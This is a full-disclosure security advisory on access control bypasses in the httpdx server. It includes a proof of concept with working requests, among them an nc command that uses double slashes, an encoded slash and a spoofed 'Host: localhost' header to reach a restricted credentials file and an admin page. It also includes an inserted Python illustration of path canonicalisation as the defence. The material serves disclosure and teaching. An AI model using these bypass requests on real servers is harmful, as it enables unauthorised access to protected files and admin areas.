JAHx131 - httpdx multiple access control bypass

--------------------------------------------------------------------------------------------
20130212 - Justanotherhacker.com : httpdx multiple access control bypass
JAHx131 - http://www.justanotherhacker.com/advisories/JAHx131.txt
--------------------------------------------------------------------------------------------

Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with
only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP,
Perl, Python, SSI, etc. All settings in one config/script file.
[ Taken from: http://sourceforge.net/projects/httpdx/ ]


--- Vulnerability description ---
Access control in httpdx is done with string matching directives in the configuration file.
Request variables are compared to static strings to determine if access should be granted.
Examples provided in the default configuration include:
    if<%REQUEST_URI% == "/data/users.txt*">{
        http.deny = 1;
    }
And another example:
    if<%REQUEST_URI% == "/admin.html*">{
        http.auth = { //authorization needed for admin's section
            user="admin",
            pass="passw000",
            realm="Stuff for admin only!"
        };
    }
As long as the request does not match these static strings, but the path still resolves to the
same file on disk, the content is served without the restriction being applied.

Additionally, because the server does not support the traditional binding of virtual hosts to
network interfaces, virtualhost-specific behaviour must be configured through similar
string-matching directives:
    if<%HTTP_HOST% != "127.0.0.1" && %HTTP_HOST% == {localhost,127.*.*.*}>{
The HTTP_HOST variable is populated from the Host: header of the request, which the client
controls, so the localhost virtual host can be reached remotely simply by sending
Host: localhost.
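The following is an added illustration, not code from httpdx or from this advisory, of the two
mistakes described above and what a server should compare instead. It reconstructs the quoted
directives as a constructed policy (DENY_PATTERNS, AUTH_PATTERNS, LOCAL_VHOST_PATTERNS are
assumptions modelled on the default configuration), shows that matching the raw REQUEST_URI lets
the "/data//users.txt" and "/%2fadmin.html" forms through, and shows that the same policy holds
once the path is canonicalised first. It also contrasts keying the local-only virtual host on the
client-written Host: header with keying it on the socket's peer address.

```python
import fnmatch
import ipaddress
import posixpath
from urllib.parse import unquote

# Constructed policy modelled on the directives quoted in this advisory:
# a denied file and a path that requires authentication. The wildcard
# forms mirror the "/data/users.txt*" and "/admin.html*" patterns.
DENY_PATTERNS = ("/data/users.txt*",)
AUTH_PATTERNS = ("/admin.html*",)
LOCAL_VHOST_PATTERNS = ("localhost", "127.*.*.*")


def naive_decision(request_uri):
    """Match the raw REQUEST_URI against the static patterns, as the
    advisory describes httpdx doing. Nothing is decoded or normalised."""
    if any(fnmatch.fnmatchcase(request_uri, p) for p in DENY_PATTERNS):
        return "deny"
    if any(fnmatch.fnmatchcase(request_uri, p) for p in AUTH_PATTERNS):
        return "auth"
    return "allow"


def canonical_path(request_uri):
    """Reduce a request URI to the path the file system will actually see:
    drop query/fragment, percent-decode until stable (so a doubly encoded
    slash is caught too), fold backslashes, collapse repeated slashes and
    resolve '.' and '..' segments."""
    path = request_uri.split("?", 1)[0].split("#", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    # normpath keeps a leading "//" on POSIX, so force a single leading slash.
    return posixpath.normpath("/" + path.lstrip("/"))


def normalised_decision(request_uri):
    """Same policy, applied only after the path has been canonicalised."""
    path = canonical_path(request_uri)
    if any(fnmatch.fnmatchcase(path, p) for p in DENY_PATTERNS):
        return "deny"
    if any(fnmatch.fnmatchcase(path, p) for p in AUTH_PATTERNS):
        return "auth"
    return "allow"


def naive_is_local_vhost(host_header):
    """Select the 'localhost' vhost from the client-supplied Host: header,
    mirroring the HTTP_HOST directive quoted in the advisory."""
    host = host_header.split(":", 1)[0].lower()
    if host == "127.0.0.1":
        return False
    return any(fnmatch.fnmatchcase(host, p) for p in LOCAL_VHOST_PATTERNS)


def peer_is_local(peer_ip):
    """Decide locality from the socket's peer address, which the server
    learns from the kernel, rather than from a header the client writes."""
    return ipaddress.ip_address(peer_ip).is_loopback


if __name__ == "__main__":
    for uri in ("/data/users.txt", "/data//users.txt",
                "/admin.html", "/%2fadmin.html"):
        print(f"{uri:18} raw={naive_decision(uri):5} "
              f"canonical={normalised_decision(uri)}")
    # A remote peer claiming to be localhost: header says yes, socket says no.
    print("Host: localhost from 192.168.58.1 ->",
          naive_is_local_vhost("localhost"), peer_is_local("192.168.58.1"))
```

The point of the contrast is that the policy itself is unchanged between the two decision
functions; only the value being compared differs. Any string-matching access control has to
run on the same canonical form the file system and the vhost selector will actually act on,
and a "local only" decision has to come from data the client cannot write.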

Discovered by: Eldar "Wireghoul" Marcussen
Type: Access control bypass
Severity: Low
Release: Full disclosure
CVE: None
Vendor: httpdx - http://sourceforge.net/projects/httpdx/
Affected versions: 1.5.5, 1.5.4 and probably earlier versions

--- Proof of Concept ---
The server comes with two examples of access control, a restricted file and a password
protected administrator area running on localhost. The following examples successfully
access these restricted areas remotely:

Access user file:
user@~$ GET http://192.168.58.135/data//users.txt
user1=pass123
user2=pass321

Access admin console:
user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 192.168.58.135 80
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2012 03:25:58 GMT
Content-Type: text/html
Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT
Content-Length: 36
Connection: close
Server: httpdx/1.5.4 (Win32)
Pragma: no-cache

Ok, you're now at admin's section.


--- Solution ---
The software appears to be abandoned, and the same versions suffer from remote code execution
bugs. Use different software instead.

--- Disclosure time line ---
12-Feb-2013 - Public disclosure

This weblog is licensed under a Creative Commons License.